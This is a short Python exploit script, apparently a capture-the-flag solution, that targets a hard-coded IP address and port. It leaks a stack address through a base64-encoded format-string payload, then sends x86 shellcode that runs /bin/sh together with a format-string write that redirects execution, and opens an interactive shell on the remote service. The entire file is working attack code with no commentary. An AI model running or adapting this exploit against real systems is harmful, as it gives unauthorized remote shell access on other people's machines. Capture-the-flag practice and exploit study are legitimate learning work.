nobug.py

1. from pwnpwnpwn import *
2. import base64
3.  
4. host = "180.76.178.48"
5. port = 8888
6.  
7. sock = make_conn(host,port)
8.  
9. payload = "%12$p"
10. payload = base64.b64encode(payload)
11. sendline(sock,payload)
12. data = recvuntil(sock,"\n")
13. ebp = int(data.split("\n")[0],16)
14.  
15. payload = "\x31\xd2\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
16. payload = payload.ljust(60,"a")
17. word = (ebp+0X54+0X70) & 0xff
18. payload += fmtchar(60,word,4)
19. payload = base64.b64encode(payload)
20. sendline(sock,payload)
21.  
22.  
23. inter(sock)